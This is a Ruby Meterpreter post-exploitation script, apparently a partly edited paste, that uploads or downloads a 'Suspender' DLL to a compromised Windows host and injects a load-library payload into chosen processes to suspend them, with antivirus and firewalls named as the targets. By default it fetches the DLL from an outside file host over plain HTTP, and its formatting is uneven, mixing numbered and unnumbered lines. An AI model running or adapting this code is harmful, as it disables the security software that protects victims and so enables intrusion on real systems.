suspend_resilientprocess.rb

#
# This script uses the Suspender DLL to suspend a Windows process, ideally a resilient process such as an AV or a stateless firewall.
# To do this, the script uploads the library to the target system and then opens the resilient process to suspend. Once the target process is open,
# the script generates a payload of type "windows/loadlibrary", allocates memory for it inside the process,
# writes the payload into the allocated memory and finally creates a thread to execute the DLL.
# After 'n' seconds the target process is suspended, together with its child processes and threads.
# The 'n' seconds correspond to the value encoded in the DLL's filename;
# for example, Suspender10.dll suspends the target process and its children after 10 seconds.
#
# Version 1.0
# written by Adastra.
#
# Script variables
  14. require 'net/http'
  15. require 'uri'
  16.  
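# Meterpreter session this script runs against. `client` (and `args`,
# `print_status`, ...) are provided by the Meterpreter script context.
session = client

# Option table. A class variable is used instead of a local because the
# `usage` method defined below cannot see the script's local variables.
@@exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help Menu." ],
  "-p" => [ true,  "List of PIDs of the processes to suspend in the remote machine, each separated by ','." ],
  "-s" => [ true,  "Number of seconds before suspending the process(es)." ],
  "-f" => [ true,  "Specify the path of Suspender.dll in the local machine (attacker) to upload in the remote machine." ],
  "-d" => [ true,  "Download the library from a URL on the Internet. If neither this option nor '-f' is used, the library is downloaded from the default URL." ]
)

# Defaults.
# NOTE(review): the default is a plain-HTTP download with no integrity check;
# whatever that URL (or anyone on the wire) serves is injected into the target
# process. Prefer '-f' with a locally verified copy of the DLL.
processes = []                 # PIDs given with -p
file_suspender_dll = nil       # local path of the DLL to upload (-f)
url_suspender_dll = 'http://www.fileserve.com/file/kBSgbw4/Suspender.dll'
downloadMode = true            # download the DLL unless -f is given
seconds_to_suspend = nil       # delay, encoded in the DLL filename (-s)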
  36. def usage
  37.     print_line("ScriptThis Script use the Suspender dll's Library to suspend a windows process, ideally a resilient process like an AV or Stateless Firewall. ")
  38.     print_line("Para do this, the script uploads the library in the target system and after open the resilient process to suspend, once opened the target process, ")
  39.     print_line("this script generates a payload of type 'windows/loadlibrary', after this, will try to allocate a memory space to load the library in the process, ")
  40.     print_line("the allocated memory into the process and finally create a thread to execute the dll. ")
  41.     print_line("When pass 'n' seconds, the target process will be suspended and his process and threads childs, will be suspended too. ")
  42.     print_line("the 'n' seconds corresponds to the value specified in the dll's filename,  ")
  43.     print_line("for example: Suspender10.dll will suspend the target process and his childs in 10 seconds. In the Script  ")
  44.  
  45.     puts @@exec_opts.usage
  46.     print_line("Example Usage:")
  47.     print_line("run suspendProcess -p process1[,process2,processN] -f PATH_OF_SUSPENDER_DLL")
  48.     print_line("run suspendProcess -p process1[,process2,processN] -d URL_OF_SUSPENDER_DLL")
  49.     raise Rex::Script::Completed
  50. end
  51.  
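# Stage the Suspender DLL on the target and return its remote path.
#
# client   - Meterpreter client used for the upload.
# file     - local path of the DLL to upload (ignored when +download+ is true).
# download - when true, fetch the DLL from +url+ into the framework data
#            directory first and upload that copy instead of +file+.
# url      - URL the DLL is fetched from when +download+ is true. Redirects
#            are not followed.
# seconds  - suspension delay; it is encoded in the remote filename
#            ("Suspender<seconds>.dll"), which is how the DLL learns it.
#
# Returns the remote path of the uploaded DLL, or '' when the upload itself
# failed (that error is printed, not raised, so callers must check for an
# empty result). Raises if +seconds+ is not an integer, if the download is
# not successful or does not look like a PE image, or if the local file does
# not exist.
def uploadFile(client, file, download, url, seconds)
  # Only an integer may reach the filename: it becomes part of a remote path.
  seconds = Integer(seconds)
  uploadedFile = ''

  if download
    print_status("Trying to download Suspender from #{url}")
    # NOTE(review): there is no known hash to verify the download against, so
    # anything served at +url+ -- or swapped in on the wire over plain HTTP --
    # ends up loaded into the target process. Prefer '-f' with a verified copy.
    response = Net::HTTP.get_response(URI.parse(url))
    unless response.is_a?(Net::HTTPSuccess)
      raise "Download of #{url} failed: #{response.code} #{response.message}"
    end
    suspender_dll = response.body.to_s
    # A DLL is a PE image and starts with the "MZ" DOS header; refuse an HTML
    # error page or redirect stub rather than uploading it as the DLL.
    raise "Download from #{url} is not a PE/DLL image" unless suspender_dll.start_with?('MZ')

    file = File.join(Msf::Config.data_directory, "Suspender#{seconds}.dll")
    # Write the downloaded bytes themselves (not the path string) to disk.
    File.open(file, "wb") { |fd| fd.write(suspender_dll) }
    print_status("Suspender#{seconds}.dll has been downloaded to #{file} (local machine). Please remove manually after use or keep for reuse.")
  end

  raise "File to Upload does not exists!" unless ::File.exist?(file)

  location = client.fs.file.expand_path("%TEMP%")
  fullPath = "#{location}\\Suspender#{seconds}.dll"
  begin
    print_status("Uploading #{file}....")
    client.fs.file.upload_file(fullPath, file)
    print_status("successfully uploaded to #{fullPath}!")
    uploadedFile = fullPath
  rescue => e
    # Upload failure is reported, not raised; the caller sees '' and decides.
    print_error("Raised a exception uploading the DLL in the remote machine Maybe the library has been uploaded before... #{e}")
  end
  uploadedFile
end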
  79.  
  80. def loadProcceses(session,processes_to_suspend,pathtosuspend)
  81.     ret=''
  82.    
  83.     print_status "Path Library: #{pathtosuspend}"
  84.     processes_to_suspend.each do |process|
  85.         begin
  86.             print_status "Trying to suspend the process with PID: #{process}"
  87.             payload = client.framework.payloads.create("windows/loadlibrary")
  88.             payload.datastore['DLL'] = pathtosuspend
  89.             payload.datastore['EXITFUNC'] = 'thread'
  90.             raw_payload = payload.generate
  91.             targetprocess = client.sys.process.open(process.to_i, PROCESS_ALL_ACCESS)
  92.             memory = targetprocess.memory.allocate(raw_payload.length + (raw_payload.length % 1024))
  93.             targetprocess.memory.write(memory, raw_payload)
  94.             targetprocess.thread.create(memory, 0)
  95.             rescue ::Exception => e
  96.                 print_error("Error allocating memory in the target process with PID #{process} the error is: #{e}")
  97.                 print_error("following with the next process in the list");
  98.                 ret = "#{ret} Error allocating memory in the target process with PID #{process}\n"
  99.         end
  100.         ret = "#{ret} The signal to suspend the #{process} has been submitted\n"
  101.     end
  102.     ret;
  103. end
  104.  
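# Main: parse the script arguments. Every option that cannot be honoured
# aborts via usage() instead of carrying on with a bad value.
@@exec_opts.parse(args) do |opt, idx, val|
  case opt
  when "-p"
    # Comma-separated PIDs; drop stray whitespace and empty items.
    processes.concat(val.split(",").map { |p| p.strip }.reject { |p| p.empty? })
  when "-d"
    url_suspender_dll = val
    print_status "The Suspender library will be downloaded from Internet, you need internet connection to make this work..."
    downloadMode = true
  when "-f"
    file_suspender_dll = val
    print_status "File to upload: #{file_suspender_dll} "
    unless ::File.exist?(file_suspender_dll)
      print_error("file not found/accessible!")
      usage
    end
    downloadMode = false
  when "-s"
    # The value becomes part of the remote filename (Suspender<n>.dll), so
    # accept digits only, and stop rather than continue with a bad value.
    unless val =~ /\A\d+\z/ && val.to_i > 0
      print_error("Number of seconds to suspend the process must be greater than zero!")
      usage
    end
    seconds_to_suspend = val
    print_status "Setting the number of seconds to suspend the process at #{seconds_to_suspend}"
  when "-h"
    usage
  else
    print_error "Invalid Option: #{opt}"
    usage
  end
end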
  138.  
  139. if seconds_to_suspend == nil
  140.     print_status "Setting the number of seconds to default (10 seconds) if you want to change that, you should use the '-s' option"
  141.     seconds_to_suspend = "10"
  142. end
  143. file_suspender_dll = uploadFile(client, file_suspender_dll,downloadMode,url_suspender_dll,seconds_to_suspend) #if file_suspender_dll
  144. print_status loadProcceses(session,processes,file_suspender_dll)